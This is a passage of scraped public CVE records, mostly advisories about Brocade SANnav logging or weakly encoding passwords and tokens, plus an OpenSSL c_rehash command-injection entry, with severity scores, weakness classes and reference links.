        "discovery": "UNKNOWN"
      },
      "title": "Plain text pbe key visible in audit log during Brocade SANnav migration from 2.4.0a to 3.0.0",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12679",
    "datePublished": "2026-02-02T21:41:16.462Z",
    "dateReserved": "2025-11-03T23:43:20.197Z",
    "dateUpdated": "2026-02-04T16:54:14.291Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2025-12680 (GCVE-0-2025-12680)

Vulnerability from cvelistv5 – Published: 2026-02-02 20:50 – Updated: 2026-02-03 15:35
VLAI?
Title
Brocade SANnav DataBase plaintext password is logged in failover logs (CVE-2025-12680)
Summary
Brocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover. The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password.
Severity ?
6 (Medium)
CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
CWE
  • CWE-256 - Plaintext Storage of a Password
  • CWE-312 - Cleartext Storage of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
Brocade SANnav Affected: before Brocade SANnav 2.4.0b
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-12680",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-03T15:34:36.683547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-03T15:35:13.850Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "SANnav",
          "vendor": "Brocade",
          "versions": [
            {
              "status": "affected",
              "version": "before Brocade SANnav 2.4.0b"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eBrocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover.  The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password. \u003c/span\u003e\u003c/p\u003e"
            }
          ],
          "value": "Brocade SANnav before Brocade SANnav 2.4.0b logs database passwords in clear text in the standby SANnav server, after disaster recovery failover.  The vulnerability could allow a remote authenticated attacker with admin privilege able to access the SANnav logs or the supportsave to read the database password."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-37",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-37 Retrieve Embedded Sensitive Data"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 6,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-256",
              "description": "CWE-256: Plaintext Storage of a Password",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-312",
              "description": "CWE-312 Cleartext Storage of Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-03T02:01:06.938Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36844"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Brocade SANnav DataBase plaintext password is logged in failover logs (CVE-2025-12680)",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2025-12680",
    "datePublished": "2026-02-02T20:50:29.756Z",
    "dateReserved": "2025-11-03T23:43:51.547Z",
    "dateUpdated": "2026-02-03T15:35:13.850Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-28168 (GCVE-0-2022-28168)

Vulnerability from cvelistv5 – Published: 2022-06-27 17:52 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength.
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.470Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:20.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28168",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0003/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28168",
    "datePublished": "2022-06-27T17:52:02.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.470Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28167 (GCVE-0-2022-28167)

Vulnerability from cvelistv5 – Published: 2022-06-27 17:51 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log
Severity ?
No CVSS data available.
CWE
  • Plaintext Storage of a Password
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.349Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Plaintext Storage of a Password",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:14.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28167",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Plaintext Storage of a Password"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0002/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28167",
    "datePublished": "2022-06-27T17:51:56.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.349Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28166 (GCVE-0-2022-28166)

Vulnerability from cvelistv5 – Published: 2022-06-27 17:51 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 & 18082.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.389Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 \u0026 18082."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:17.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28166",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 \u0026 18082."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0001/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28166",
    "datePublished": "2022-06-27T17:51:51.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.389Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2068 (GCVE-0-2022-2068)

Vulnerability from cvelistv5 – Published: 2022-06-21 14:45 – Updated: 2025-12-30 04:55
VLAI?
Title
The c_rehash script allows command injection
Summary
In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).
Severity ?
No CVSS data available.
CWE
  • Command injection
Assigner
References
Impacted products
Vendor Product Version
OpenSSL OpenSSL Affected: Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3)
Affected: Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o)
Affected: Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)
Create a notification for this product.
Date Public ?
2022-06-21 00:00
Credits
Chancen (Qingteng 73lab)
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:45:47.155Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.openssl.org/news/secadv/20220621.txt"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
          },
          {
            "name": "DSA-5169",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5169"
          },
          {
            "name": "FEDORA-2022-3b7d0abd0b",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
          },
          {
            "name": "FEDORA-2022-41890e9e44",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
          },
          {
            "url": "http://seclists.org/fulldisclosure/2024/Nov/0"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-2068",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2023-07-21T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-78",
                "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-30T04:55:27.130Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "OpenSSL",
          "vendor": "OpenSSL",
          "versions": [
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3)"
            },
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o)"
            },
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Chancen (Qingteng 73lab)"
        }
      ],
      "datePublic": "2022-06-21T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "lang": "eng",
              "url": "https://www.openssl.org/policies/secpolicy.html#Moderate",
              "value": "Moderate"
            },
            "type": "unknown"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Command injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-01-10T00:00:00.000Z",
        "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
        "shortName": "openssl"
      },
      "references": [
        {
          "url": "https://www.openssl.org/news/secadv/20220621.txt"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
        },
        {
          "name": "DSA-5169",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5169"
        },
        {
          "name": "FEDORA-2022-3b7d0abd0b",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
        },
        {
          "name": "FEDORA-2022-41890e9e44",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
        }
      ],
      "title": "The c_rehash script allows command injection"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
    "assignerShortName": "openssl",
    "cveId": "CVE-2022-2068",
    "datePublished": "2022-06-21T14:45:20.597Z",
    "dateReserved": "2022-06-13T00:00:00.000Z",
    "dateUpdated": "2025-12-30T04:55:27.130Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-28162 (GCVE-0-2022-28162)

Vulnerability from cvelistv5 – Published: 2022-05-09 16:31 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text.
Severity ?
No CVSS data available.
CWE
  • Cleartext Transmission of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.091Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Cleartext Transmission of Sensitive Information",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-09T16:31:49.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28162",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Cleartext Transmission of Sensitive Information"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28162",
    "datePublished": "2022-05-09T16:31:49.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.091Z",
    "state": "PUBLISHED"
  },
